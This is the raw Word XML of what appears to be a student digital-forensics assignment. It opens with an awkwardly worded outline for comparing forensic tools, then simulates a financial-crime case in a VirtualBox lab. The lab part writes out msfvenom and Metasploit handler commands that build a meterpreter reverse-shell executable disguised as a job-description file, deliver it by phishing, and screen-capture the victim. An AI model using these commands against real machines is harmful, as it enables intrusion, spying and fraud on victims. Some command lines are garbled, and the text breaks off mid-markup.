      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Capabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C7F926" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Examine the capabilities of both open-source and business apparatuses, zeroing in on thoroughness, adaptability, and appropriateness for different scientific errands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AE1FD1" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0755E4" w14:textId="1134C295" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Help and Updates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76D1D0" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evaluate the help systems for the two sorts of devices, including local area driven help for open-source and committed help for business instruments. Talk about the recurrence and dependability of updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5BE510" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F6F821D" w14:textId="21DF11BD" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lawful Contemplations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DF4A35" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Explore the lawful parts of utilizing open-source and business devices, featuring confirmations, suitability, and consistence with legitimate principles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682EAB84" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6176E61B" w14:textId="05B84CB1" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Devices Examination Outline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29667D04" w14:textId="72E4A1D5" w:rsidR="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sum up the critical discoveries from the assessment, recognizing qualities, shortcomings, and contemplations for dynamic in choosing advanced criminological apparatuses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48216309" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD6C8CF" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E29C8B" w14:textId="63E40489" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suggestions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C5730" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In light of the examination, give proposals to the utilization of explicit apparatuses or blends of devices in various situations. Think about the remarkable requirements and imperatives of your association.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C9AC59" w14:textId="77777777" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="927"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E598FE" w14:textId="7D71F4E7" w:rsidR="006A553D" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA9C163" w14:textId="6B2B06C3" w:rsidR="0044529A" w:rsidRPr="006A553D" w:rsidRDefault="006A553D" w:rsidP="006A553D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A553D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Close the report by summing up the general condition of advanced measurable instruments, accentuating their developing nature, and recognizing the significance of persistent assessment and variation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D143B" w14:textId="5F53873B" w:rsidR="0044529A" w:rsidRDefault="0044529A" w:rsidP="0044529A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2277BDC6" w14:textId="66B81883" w:rsidR="00ED621B" w:rsidRDefault="00ED621B" w:rsidP="0044529A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9153A6" w14:textId="4542DD06" w:rsidR="00ED621B" w:rsidRDefault="00ED621B" w:rsidP="0044529A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3126013A" w14:textId="1A09E3F1" w:rsidR="00ED621B" w:rsidRDefault="00ED621B" w:rsidP="0044529A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231F2161" w14:textId="7C504327" w:rsidR="00ED621B" w:rsidRDefault="00ED621B" w:rsidP="0044529A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E6D2F3" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E39B8B" w14:textId="6A377910" w:rsidR="00ED621B" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>TASK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060BD7EA" w14:textId="0F66CF61" w:rsidR="00ED621B" w:rsidRDefault="00ED621B" w:rsidP="00E72A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762E6585" w14:textId="095616FF" w:rsidR="00ED621B" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This is a Team Activity. Simulate a digital forensic investigation by collecting and analysing data from a given hard disk based on a predefined theme or a concept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE51D94" w14:textId="53AC866A" w:rsidR="00ED621B" w:rsidRPr="00E72A42" w:rsidRDefault="00ED621B" w:rsidP="00E72A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAD6D92" w14:textId="2B357A0C" w:rsidR="00ED621B" w:rsidRDefault="00ED621B" w:rsidP="00E72A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D97F31B" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586B84D7" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Theme: Financial Crime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD40306" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C561D4D" w14:textId="202C5B4C" w:rsidR="00ED621B" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker hacks the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>victims</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> wireless connection and sends a phishing email describing about the possible job openings available in USA with the job description attached to the email but the attachment contains the reverse shell payload. After sending the phishing email, the attacker initiatesmsfconsole and listens for any active sessions. By mistake, the victim executes the payload which establishes the enterpriser session. The attacker monitors the user activities using shell commands, possible remote screen capturing techniques. In the meantime, the attacker finds out that the victims ordering products from amazon.com site. The attacker launches the remote desktop connection with the victim machine and orders his exclusive products using the victim’s login credentials. How the victim finds the crime and recovers from it, is shown in the execution steps using the evidences collected with the timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B72D94" w14:textId="6E5C5EBB" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687D2A27" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787AD8F1" w14:textId="49D9EA69" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The entire task is executed within the Oracle VirtualBox. The attacker machine is Kali Linux and the victim machine is Windows 10 Home. Both the machines are setup in the same wireless connection which is stimulated using Nat network option in Oracle VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B94D5D" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE19635" w14:textId="2B6592B1" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DECE87E" w14:textId="77777777" w:rsidR="00171782" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Toolkit is extensively tested and verified to create the malware payload in pdf format which is widely used method to define the job description. Reverse shell payload is created in pdf format, but when it is executed in the victim’s machine, the enterpriser is not able to establish a stable active session. Finalised within the team to utilise msfvenom to create the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7C041C" w14:textId="16A5B3BC" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B69105" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step: 1 - Reverse Shell payload Creation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4E2B69" w14:textId="3C5CC3FA" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Below command is utilised to create the payload in executable format. The collected payload ispassword protected and send out with the phishing email from the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE431AF" w14:textId="53C87CAB" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># msfvenom -p windows/meterpreter/reverse_tcp host=192.168.100.6 lport=4455 -f exe &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F52FEE9" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jobroles.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E09FFB1" w14:textId="41CEE005" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># rear a -p jobroles.rar jobroles.exe Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A1ECAA" w14:textId="3874FC81" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A - Phishing Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B07AEC9" w14:textId="70C9519F" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705DB0F3" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step: 2 - Enabling the Reverse_tcp Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A429AAA" w14:textId="4FF1769A" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reverse_tcp payload is set along with the other options to enable the exploit so that the hacker can establish a session with the victim’s machine. Once the victim opens the email and executes the payload without issues, meterpreter session is established. Attacker uses screen capture technique to monitor victim’s activities on the Windows client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFE17D" w14:textId="3D978E80" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> msf6 &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346A4B95" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE25E6E" w14:textId="0B35365A" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set host 192.168.100.6 msf6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434D90DB" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit(multi/handler) &gt; set lport 4455</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764D43A9" w14:textId="1372D6F1" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B497AB" w14:textId="4C55D6B0" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Meterpreter &gt; screen capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC9087" w14:textId="13040A05" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evidence: B - Screen capture session Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D012B66" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
